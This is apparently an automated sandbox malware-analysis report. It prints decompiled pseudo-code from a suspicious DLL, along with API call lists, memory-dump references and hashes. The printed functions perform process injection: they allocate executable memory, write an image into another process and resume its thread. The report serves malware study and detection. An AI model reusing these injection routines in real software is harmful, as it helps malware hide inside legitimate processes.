                                                                                                                                                                                                                                                                            			E1000AA38(void* __ecx, void* __eflags) {
                                                                                                                                                                                                                                                                            				char _v44;
                                                                                                                                                                                                                                                                            				intOrPtr _t9;
                                                                                                                                                                                                                                                                            				intOrPtr _t12;
                                                                                                                                                                                                                                                                            				void* _t13;
                                                                                                                                                                                                                                                                            				intOrPtr _t17;
                                                                                                                                                                                                                                                                            				void* _t20;
                                                                                                                                                                                                                                                                            				void* _t21;
                                                                                                                                                                                                                                                                            				void* _t28;
                                                                                                                                                                                                                                                                            				void* _t29;
                                                                                                                                                                                                                                                                            				void* _t31;
                                                                                                                                                                                                                                                                            				void* _t32;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_t9 =  *0x10020fd8; // 0x466fc50
                                                                                                                                                                                                                                                                            				_t1 = _t9 + 0xac; // 0x4296aa0e
                                                                                                                                                                                                                                                                            				_t21 = __ecx;
                                                                                                                                                                                                                                                                            				E1000C08F( &_v44,  *_t1 + 7, __eflags);
                                                                                                                                                                                                                                                                            				_t32 = 0;
                                                                                                                                                                                                                                                                            				_t12 =  *0x10020fa0; // 0x466f8a0
                                                                                                                                                                                                                                                                            				_t13 =  *((intOrPtr*)(_t12 + 0xd4))(0, 0, 0,  &_v44, _t28, _t31, _t20);
                                                                                                                                                                                                                                                                            				_t29 = _t13;
                                                                                                                                                                                                                                                                            				if(_t29 != 0) {
                                                                                                                                                                                                                                                                            					GetLastError();
                                                                                                                                                                                                                                                                            					NtResumeThread( *(_t21 + 4), 0);
                                                                                                                                                                                                                                                                            					_t17 =  *0x10020fa0; // 0x466f8a0
                                                                                                                                                                                                                                                                            					_push(0x2710);
                                                                                                                                                                                                                                                                            					_push(_t29);
                                                                                                                                                                                                                                                                            					if( *((intOrPtr*)(_t17 + 0x30))() == 0) {
                                                                                                                                                                                                                                                                            						_t32 = 1;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					FindCloseChangeNotification(_t29);
                                                                                                                                                                                                                                                                            					_t13 = _t32;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				return _t13;
                                                                                                                                                                                                                                                                            			}














                                                                                                                                                                                                                                                                            0x1000aa3b
                                                                                                                                                                                                                                                                            0x1000aa43
                                                                                                                                                                                                                                                                            0x1000aa4b
                                                                                                                                                                                                                                                                            0x1000aa54
                                                                                                                                                                                                                                                                            0x1000aa5c
                                                                                                                                                                                                                                                                            0x1000aa5f
                                                                                                                                                                                                                                                                            0x1000aa67
                                                                                                                                                                                                                                                                            0x1000aa6d
                                                                                                                                                                                                                                                                            0x1000aa71
                                                                                                                                                                                                                                                                            0x1000aa73
                                                                                                                                                                                                                                                                            0x1000aa82
                                                                                                                                                                                                                                                                            0x1000aa85
                                                                                                                                                                                                                                                                            0x1000aa8a
                                                                                                                                                                                                                                                                            0x1000aa8f
                                                                                                                                                                                                                                                                            0x1000aa95
                                                                                                                                                                                                                                                                            0x1000aa99
                                                                                                                                                                                                                                                                            0x1000aa99
                                                                                                                                                                                                                                                                            0x1000aaa1
                                                                                                                                                                                                                                                                            0x1000aaa4
                                                                                                                                                                                                                                                                            0x1000aaa4
                                                                                                                                                                                                                                                                            0x1000aaaa

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,10004C12), ref: 1000AA73
                                                                                                                                                                                                                                                                            • NtResumeThread.NTDLL(?,00000000,?,00000000,00000000,?,?,?,?,?,?,?,?,?,10004C12), ref: 1000AA82
                                                                                                                                                                                                                                                                            • FindCloseChangeNotification.KERNELBASE(00000000,?,00000000,00000000,?,?,?,?,?,?,?,?,?,10004C12), ref: 1000AAA1
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.393657520.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393651974.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393691292.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393703600.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.394711206.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_10000000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ChangeCloseErrorFindLastNotificationResumeThread
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 4135917582-0
                                                                                                                                                                                                                                                                            • Opcode ID: 228c20943cadb0bc02e93a6f657e61c4507d0bad2e13d2432159749fd6f40c79
                                                                                                                                                                                                                                                                            • Instruction ID: ecd51d03452cafcdcdf148b0bc3d5607b702456ca6ceb967f89cd25d37e20497
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 228c20943cadb0bc02e93a6f657e61c4507d0bad2e13d2432159749fd6f40c79
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 02012632301120AFD350CBA9CDC8DAB3BF9EF4E6A1B150024FA05D7616C730D802CBA1
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 79%
                                                                                                                                                                                                                                                                            			E1000A51F(void* __ecx, void* __edx) {
                                                                                                                                                                                                                                                                            				void* _v8;
                                                                                                                                                                                                                                                                            				void* _v12;
                                                                                                                                                                                                                                                                            				long _v16;
                                                                                                                                                                                                                                                                            				intOrPtr _v20;
                                                                                                                                                                                                                                                                            				intOrPtr _v24;
                                                                                                                                                                                                                                                                            				intOrPtr _v28;
                                                                                                                                                                                                                                                                            				long _v32;
                                                                                                                                                                                                                                                                            				long _t37;
                                                                                                                                                                                                                                                                            				void* _t38;
                                                                                                                                                                                                                                                                            				intOrPtr _t39;
                                                                                                                                                                                                                                                                            				intOrPtr _t42;
                                                                                                                                                                                                                                                                            				intOrPtr _t43;
                                                                                                                                                                                                                                                                            				void* _t46;
                                                                                                                                                                                                                                                                            				void* _t58;
                                                                                                                                                                                                                                                                            				void* _t71;
                                                                                                                                                                                                                                                                            				intOrPtr* _t73;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v8 = _v8 & 0x00000000;
                                                                                                                                                                                                                                                                            				_t71 = __edx;
                                                                                                                                                                                                                                                                            				_t58 = __ecx;
                                                                                                                                                                                                                                                                            				_t3 = _t71 + 0x3c; // 0x100
                                                                                                                                                                                                                                                                            				_t73 =  *_t3 + __edx;
                                                                                                                                                                                                                                                                            				if( *_t73 != 0x4550) {
                                                                                                                                                                                                                                                                            					L5:
                                                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				_v16 =  *(_t73 + 0x50);
                                                                                                                                                                                                                                                                            				_t37 = NtAllocateVirtualMemory(__ecx,  &_v8, 0,  &_v16, 0x3000, 0x40); // executed
                                                                                                                                                                                                                                                                            				if(_t37 < 0) {
                                                                                                                                                                                                                                                                            					goto L5;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				_t38 = E10009252( *0x10020fd8, 0x1ac4);
                                                                                                                                                                                                                                                                            				_v12 = _t38;
                                                                                                                                                                                                                                                                            				if(_t38 == 0) {
                                                                                                                                                                                                                                                                            					goto L5;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t38 + 0x224)) = _v8;
                                                                                                                                                                                                                                                                            				_t39 = E1000CAF3( *0x100210b4, _t58, _t38, 0x1ac4, 4); // executed
                                                                                                                                                                                                                                                                            				_v20 = _t39;
                                                                                                                                                                                                                                                                            				_push(0x1ac4);
                                                                                                                                                                                                                                                                            				_push( &_v12);
                                                                                                                                                                                                                                                                            				if(_t39 != 0) {
                                                                                                                                                                                                                                                                            					E10009203();
                                                                                                                                                                                                                                                                            					_t42 =  *0x10020fa8; // 0x10000000
                                                                                                                                                                                                                                                                            					_v24 = _t42;
                                                                                                                                                                                                                                                                            					_t43 =  *0x10020fd8; // 0x466fc50
                                                                                                                                                                                                                                                                            					_v28 = _t43;
                                                                                                                                                                                                                                                                            					 *0x10020fa8 = _v8;
                                                                                                                                                                                                                                                                            					 *0x10020fd8 = _v20;
                                                                                                                                                                                                                                                                            					_t46 = E10009252(_t71,  *(_t73 + 0x50)); // executed
                                                                                                                                                                                                                                                                            					_v12 = _t46;
                                                                                                                                                                                                                                                                            					if(_t46 == 0) {
                                                                                                                                                                                                                                                                            						goto L5;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					E1000A49E(_t46, _v8, _t71);
                                                                                                                                                                                                                                                                            					_v32 = _v32 & 0x00000000;
                                                                                                                                                                                                                                                                            					 *0x10020fa8 = _v24;
                                                                                                                                                                                                                                                                            					 *0x10020fd8 = _v28;
                                                                                                                                                                                                                                                                            					if(NtWriteVirtualMemory(_t58, _v8, _v12,  *(_t73 + 0x50),  &_v32) < 0) {
                                                                                                                                                                                                                                                                            						goto L5;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					E100144D8(_t52,  *0x100210b4, _t58, _t71, _v8); // executed
                                                                                                                                                                                                                                                                            					E10009203( &_v12, 0);
                                                                                                                                                                                                                                                                            					return _v8;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				E10009203();
                                                                                                                                                                                                                                                                            				goto L5;
                                                                                                                                                                                                                                                                            			}



















                                                                                                                                                                                                                                                                            0x1000a525
                                                                                                                                                                                                                                                                            0x1000a52c
                                                                                                                                                                                                                                                                            0x1000a52e
                                                                                                                                                                                                                                                                            0x1000a530
                                                                                                                                                                                                                                                                            0x1000a533
                                                                                                                                                                                                                                                                            0x1000a53b
                                                                                                                                                                                                                                                                            0x1000a5b1
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x1000a5b1
                                                                                                                                                                                                                                                                            0x1000a542
                                                                                                                                                                                                                                                                            0x1000a55a
                                                                                                                                                                                                                                                                            0x1000a55e
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x1000a56b
                                                                                                                                                                                                                                                                            0x1000a570
                                                                                                                                                                                                                                                                            0x1000a577
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x1000a580
                                                                                                                                                                                                                                                                            0x1000a592
                                                                                                                                                                                                                                                                            0x1000a59a
                                                                                                                                                                                                                                                                            0x1000a5a2
                                                                                                                                                                                                                                                                            0x1000a5a7
                                                                                                                                                                                                                                                                            0x1000a5a8
                                                                                                                                                                                                                                                                            0x1000a5b8
                                                                                                                                                                                                                                                                            0x1000a5bd
                                                                                                                                                                                                                                                                            0x1000a5c2
                                                                                                                                                                                                                                                                            0x1000a5c5
                                                                                                                                                                                                                                                                            0x1000a5ca
                                                                                                                                                                                                                                                                            0x1000a5d0
                                                                                                                                                                                                                                                                            0x1000a5d8
                                                                                                                                                                                                                                                                            0x1000a5e1
                                                                                                                                                                                                                                                                            0x1000a5e9
                                                                                                                                                                                                                                                                            0x1000a5ee
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x1000a5f6
                                                                                                                                                                                                                                                                            0x1000a5fe
                                                                                                                                                                                                                                                                            0x1000a602
                                                                                                                                                                                                                                                                            0x1000a60b
                                                                                                                                                                                                                                                                            0x1000a628
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x1000a635
                                                                                                                                                                                                                                                                            0x1000a640
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x1000a648
                                                                                                                                                                                                                                                                            0x1000a5aa
                                                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • NtAllocateVirtualMemory.NTDLL(100043D8,00000000,00000000,?,00003000,00000040,?,00000000,100043D8,?,?,?,1000A958,?,00000000), ref: 1000A55A
                                                                                                                                                                                                                                                                            • NtWriteVirtualMemory.NTDLL(100043D8,00000000,00000000,?,00000000), ref: 1000A623
                                                                                                                                                                                                                                                                              • Part of subcall function 1000CAF3: NtAllocateVirtualMemory.NTDLL(?,00000040,00000000,00000000,00003000,00000004,?,00000000,00000000,00000000,00000000,00000040), ref: 1000CB22
                                                                                                                                                                                                                                                                              • Part of subcall function 1000CAF3: NtWriteVirtualMemory.NTDLL(?,00000040,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000040), ref: 1000CB34
                                                                                                                                                                                                                                                                              • Part of subcall function 1000CAF3: NtProtectVirtualMemory.NTDLL(?,00000040,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000040), ref: 1000CB4E
                                                                                                                                                                                                                                                                              • Part of subcall function 10009203: HeapFree.KERNEL32(00000000,00000000), ref: 10009249
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.393657520.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393651974.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393691292.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393703600.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.394711206.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_10000000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: MemoryVirtual$AllocateWrite$FreeHeapProtect
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 4171237596-0
                                                                                                                                                                                                                                                                            • Opcode ID: 7688612ed510fc03d4c2a3d6e90536308585b70ac75cbc34e99945c669c61362
                                                                                                                                                                                                                                                                            • Instruction ID: 85762fa87bf84ebb9b60b5ed767da253e99bba6ab009e757f312c963c4a3c12a
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7688612ed510fc03d4c2a3d6e90536308585b70ac75cbc34e99945c669c61362
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DC413F75E00719BFEB40CFA4CD81AAE77F9FB48345F200169F604E7695E770AA418BA4
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 95 1000a771-1000a79a call 1000cf09 98 1000a7a0-1000a7a2 95->98 99 1000a79c-1000a79e 95->99 100 1000a7b2-1000a7cb lstrlenW call 1000a650 98->100 101 1000a7a4 98->101 99->101 105 1000a802-1000a80f call 1000a41e 100->105 106 1000a7cd-1000a7dd call 1000cf09 100->106 102 1000a7a6-1000a7b0 101->102 102->100 102->102 113 1000a815-1000a818 105->113 114 1000a8e7-1000a8ee call 1000a455 105->114 111 1000a7e5-1000a7ef 106->111 112 1000a7df-1000a7e3 106->112 111->111 115 1000a7f1-1000a7fd lstrlenW 111->115 112->111 112->115 113->114 117 1000a81e-1000a821 113->117 123 1000a8f0-1000a900 call 10009203 114->123 124 1000a902-1000a910 call 10009203 114->124 119 1000a911-1000a915 115->119 118 1000a828-1000a82a 117->118 121 1000a830-1000a84e call 1000936a 118->121 122 1000a8d2-1000a8e1 118->122 131 1000a850-1000a855 call 1000e23e 121->131 132 1000a85a-1000a86a call 1000cb78 121->132 122->113 122->114 123->124 124->119 131->132 136 1000a894-1000a897 132->136 137 1000a86c-1000a883 call 1000a93e 132->137 138 1000a8c2-1000a8cc 136->138 139 1000a899-1000a89b 136->139 137->136 144 1000a885-1000a888 call 1000aa38 137->144 138->118 138->122 141 1000a8ac-1000a8bc 139->141 142 1000a89d-1000a8a3 139->142 141->138 142->141 147 1000a88d-1000a88f 144->147 147->136 148 1000a891-1000a893 147->148 148->136
                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E1000A771(WCHAR* __edx) {
                                                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                                                                                                                            				WCHAR* _v24;
                                                                                                                                                                                                                                                                            				char _v28;
                                                                                                                                                                                                                                                                            				char _v29;
                                                                                                                                                                                                                                                                            				intOrPtr _v40;
                                                                                                                                                                                                                                                                            				short _v44;
                                                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                                                            				signed int _t48;
                                                                                                                                                                                                                                                                            				signed int _t59;
                                                                                                                                                                                                                                                                            				intOrPtr _t62;
                                                                                                                                                                                                                                                                            				signed int _t64;
                                                                                                                                                                                                                                                                            				intOrPtr _t66;
                                                                                                                                                                                                                                                                            				intOrPtr _t67;
                                                                                                                                                                                                                                                                            				intOrPtr _t69;
                                                                                                                                                                                                                                                                            				intOrPtr _t71;
                                                                                                                                                                                                                                                                            				signed int _t73;
                                                                                                                                                                                                                                                                            				signed int _t74;
                                                                                                                                                                                                                                                                            				signed int _t76;
                                                                                                                                                                                                                                                                            				char _t82;
                                                                                                                                                                                                                                                                            				char _t96;
                                                                                                                                                                                                                                                                            				signed int _t98;
                                                                                                                                                                                                                                                                            				char _t99;
                                                                                                                                                                                                                                                                            				signed int _t100;
                                                                                                                                                                                                                                                                            				signed int _t101;
                                                                                                                                                                                                                                                                            				signed int _t102;
                                                                                                                                                                                                                                                                            				void* _t104;
                                                                                                                                                                                                                                                                            				void* _t105;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_t97 = __edx;
                                                                                                                                                                                                                                                                            				_t82 = 0;
                                                                                                                                                                                                                                                                            				_v24 = __edx;
                                                                                                                                                                                                                                                                            				_v20 = 0;
                                                                                                                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                                                                                                                            				_t48 = E1000CF09("endless");
                                                                                                                                                                                                                                                                            				_t98 = _t48;
                                                                                                                                                                                                                                                                            				_v29 = 0;
                                                                                                                                                                                                                                                                            				_t100 = 0xf;
                                                                                                                                                                                                                                                                            				if(_t98 <= _t100) {
                                                                                                                                                                                                                                                                            					__eflags = _t98;
                                                                                                                                                                                                                                                                            					if(_t98 == 0) {
                                                                                                                                                                                                                                                                            						goto L5;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					goto L3;
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					_t98 = _t100;
                                                                                                                                                                                                                                                                            					L3:
                                                                                                                                                                                                                                                                            					_t96 = _t82;
                                                                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                                                                            						_t5 = _t96 + 0x41; // 0x41
                                                                                                                                                                                                                                                                            						 *((char*)(_t104 + _t96 - 0x28)) = _t5;
                                                                                                                                                                                                                                                                            						_t96 = _t96 + 1;
                                                                                                                                                                                                                                                                            					} while (_t96 < _t98);
                                                                                                                                                                                                                                                                            					L5:
                                                                                                                                                                                                                                                                            					lstrlenW( &_v44);
                                                                                                                                                                                                                                                                            					_t99 = E1000A650( &_v20);
                                                                                                                                                                                                                                                                            					_v28 = _t99;
                                                                                                                                                                                                                                                                            					if(_t99 != 0) {
                                                                                                                                                                                                                                                                            						E1000A41E();
                                                                                                                                                                                                                                                                            						_t101 = _v20;
                                                                                                                                                                                                                                                                            						_v16 = _t82;
                                                                                                                                                                                                                                                                            						__eflags = _t101;
                                                                                                                                                                                                                                                                            						if(_t101 == 0) {
                                                                                                                                                                                                                                                                            							L26:
                                                                                                                                                                                                                                                                            							E1000A455();
                                                                                                                                                                                                                                                                            							__eflags = _t101;
                                                                                                                                                                                                                                                                            							if(_t101 == 0) {
                                                                                                                                                                                                                                                                            								L28:
                                                                                                                                                                                                                                                                            								E10009203( &_v28, _t82);
                                                                                                                                                                                                                                                                            								return _v8;
                                                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                                                            								goto L27;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							do {
                                                                                                                                                                                                                                                                            								L27:
                                                                                                                                                                                                                                                                            								E10009203(_t99, 0xfffffffe);
                                                                                                                                                                                                                                                                            								_t99 = _t99 + 4;
                                                                                                                                                                                                                                                                            								_t101 = _t101 - 1;
                                                                                                                                                                                                                                                                            								__eflags = _t101;
                                                                                                                                                                                                                                                                            							} while (_t101 != 0);
                                                                                                                                                                                                                                                                            							goto L28;
                                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                                            							goto L11;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						while(1) {
                                                                                                                                                                                                                                                                            							L11:
                                                                                                                                                                                                                                                                            							__eflags = _v8 - _t82;
                                                                                                                                                                                                                                                                            							if(_v8 != _t82) {
                                                                                                                                                                                                                                                                            								goto L26;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							_t102 = _v8;
                                                                                                                                                                                                                                                                            							_v12 = 1;
                                                                                                                                                                                                                                                                            							do {
                                                                                                                                                                                                                                                                            								__eflags = _t102;
                                                                                                                                                                                                                                                                            								if(_t102 != 0) {
                                                                                                                                                                                                                                                                            									break;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								E1000936A( &_v44, _t82, 0x10);
                                                                                                                                                                                                                                                                            								_t62 =  *0x10020fd8; // 0x466fc50
                                                                                                                                                                                                                                                                            								_t105 = _t105 + 0xc;
                                                                                                                                                                                                                                                                            								__eflags =  *(_t62 + 0x1898) & 0x00000200;
                                                                                                                                                                                                                                                                            								if(__eflags != 0) {
                                                                                                                                                                                                                                                                            									E1000E23E(_t82, _t97, __eflags);
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								_t97 =  &_v44;
                                                                                                                                                                                                                                                                            								_t64 = E1000CB78( *((intOrPtr*)(_t99 + _v16 * 4)),  &_v44); // executed
                                                                                                                                                                                                                                                                            								__eflags = _t64;
                                                                                                                                                                                                                                                                            								if(_t64 >= 0) {
                                                                                                                                                                                                                                                                            									_t97 =  &_v44;
                                                                                                                                                                                                                                                                            									_t73 = E1000A93E(0x100013b8,  &_v44, _v24, _v12); // executed
                                                                                                                                                                                                                                                                            									__eflags = _t73;
                                                                                                                                                                                                                                                                            									if(__eflags != 0) {
                                                                                                                                                                                                                                                                            										_t74 = E1000AA38( &_v44, __eflags); // executed
                                                                                                                                                                                                                                                                            										__eflags = _t74;
                                                                                                                                                                                                                                                                            										if(_t74 != 0) {
                                                                                                                                                                                                                                                                            											_t102 = 1;
                                                                                                                                                                                                                                                                            											__eflags = 1;
                                                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								__eflags = _v44 - _t82;
                                                                                                                                                                                                                                                                            								if(_v44 != _t82) {
                                                                                                                                                                                                                                                                            									__eflags = _t102;
                                                                                                                                                                                                                                                                            									if(_t102 == 0) {
                                                                                                                                                                                                                                                                            										_t71 =  *0x10020fa0; // 0x466f8a0
                                                                                                                                                                                                                                                                            										 *((intOrPtr*)(_t71 + 0x114))(_v44, _t82);
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            									_t67 =  *0x10020fa0; // 0x466f8a0
                                                                                                                                                                                                                                                                            									 *((intOrPtr*)(_t67 + 0x34))(_v40);
                                                                                                                                                                                                                                                                            									_t69 =  *0x10020fa0; // 0x466f8a0
                                                                                                                                                                                                                                                                            									 *((intOrPtr*)(_t69 + 0x34))(_v44);
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								_t66 = _v12 + 1;
                                                                                                                                                                                                                                                                            								_v12 = _t66;
                                                                                                                                                                                                                                                                            								__eflags = _t66 - 2;
                                                                                                                                                                                                                                                                            							} while (_t66 <= 2);
                                                                                                                                                                                                                                                                            							_t59 = _v16 + 1;
                                                                                                                                                                                                                                                                            							_v8 = _t102;
                                                                                                                                                                                                                                                                            							_t101 = _v20;
                                                                                                                                                                                                                                                                            							_v16 = _t59;
                                                                                                                                                                                                                                                                            							__eflags = _t59 - _t101;
                                                                                                                                                                                                                                                                            							if(_t59 < _t101) {
                                                                                                                                                                                                                                                                            								continue;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							goto L26;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						goto L26;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_t76 = E1000CF09("appear");
                                                                                                                                                                                                                                                                            					_v29 = _t82;
                                                                                                                                                                                                                                                                            					if(_t76 > _t100) {
                                                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                                                            							L8:
                                                                                                                                                                                                                                                                            							_t12 = _t82 + 0x41; // 0x41
                                                                                                                                                                                                                                                                            							 *((char*)(_t104 + _t82 - 0x28)) = _t12;
                                                                                                                                                                                                                                                                            							_t82 = _t82 + 1;
                                                                                                                                                                                                                                                                            						} while (_t82 < _t100);
                                                                                                                                                                                                                                                                            						L9:
                                                                                                                                                                                                                                                                            						lstrlenW( &_v44);
                                                                                                                                                                                                                                                                            						return 0;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_t100 = _t76;
                                                                                                                                                                                                                                                                            					if(_t100 == 0) {
                                                                                                                                                                                                                                                                            						goto L9;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					goto L8;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            			}

































                                                                                                                                                                                                                                                                            0x1000a771
                                                                                                                                                                                                                                                                            0x1000a77a
                                                                                                                                                                                                                                                                            0x1000a77c
                                                                                                                                                                                                                                                                            0x1000a784
                                                                                                                                                                                                                                                                            0x1000a787
                                                                                                                                                                                                                                                                            0x1000a78a
                                                                                                                                                                                                                                                                            0x1000a792
                                                                                                                                                                                                                                                                            0x1000a794
                                                                                                                                                                                                                                                                            0x1000a797
                                                                                                                                                                                                                                                                            0x1000a79a
                                                                                                                                                                                                                                                                            0x1000a7a0
                                                                                                                                                                                                                                                                            0x1000a7a2
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x1000a79c
                                                                                                                                                                                                                                                                            0x1000a79c
                                                                                                                                                                                                                                                                            0x1000a7a4
                                                                                                                                                                                                                                                                            0x1000a7a4
                                                                                                                                                                                                                                                                            0x1000a7a6
                                                                                                                                                                                                                                                                            0x1000a7a6
                                                                                                                                                                                                                                                                            0x1000a7a9
                                                                                                                                                                                                                                                                            0x1000a7ad
                                                                                                                                                                                                                                                                            0x1000a7ae
                                                                                                                                                                                                                                                                            0x1000a7b2
                                                                                                                                                                                                                                                                            0x1000a7b6
                                                                                                                                                                                                                                                                            0x1000a7c4
                                                                                                                                                                                                                                                                            0x1000a7c6
                                                                                                                                                                                                                                                                            0x1000a7cb
                                                                                                                                                                                                                                                                            0x1000a802
                                                                                                                                                                                                                                                                            0x1000a807
                                                                                                                                                                                                                                                                            0x1000a80a
                                                                                                                                                                                                                                                                            0x1000a80d
                                                                                                                                                                                                                                                                            0x1000a80f
                                                                                                                                                                                                                                                                            0x1000a8e7
                                                                                                                                                                                                                                                                            0x1000a8e7
                                                                                                                                                                                                                                                                            0x1000a8ec
                                                                                                                                                                                                                                                                            0x1000a8ee
                                                                                                                                                                                                                                                                            0x1000a902
                                                                                                                                                                                                                                                                            0x1000a907
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x1000a8f0
                                                                                                                                                                                                                                                                            0x1000a8f0
                                                                                                                                                                                                                                                                            0x1000a8f3
                                                                                                                                                                                                                                                                            0x1000a8f9
                                                                                                                                                                                                                                                                            0x1000a8fd
                                                                                                                                                                                                                                                                            0x1000a8fd
                                                                                                                                                                                                                                                                            0x1000a8fd
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x1000a815
                                                                                                                                                                                                                                                                            0x1000a815
                                                                                                                                                                                                                                                                            0x1000a815
                                                                                                                                                                                                                                                                            0x1000a818
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x1000a81e
                                                                                                                                                                                                                                                                            0x1000a821
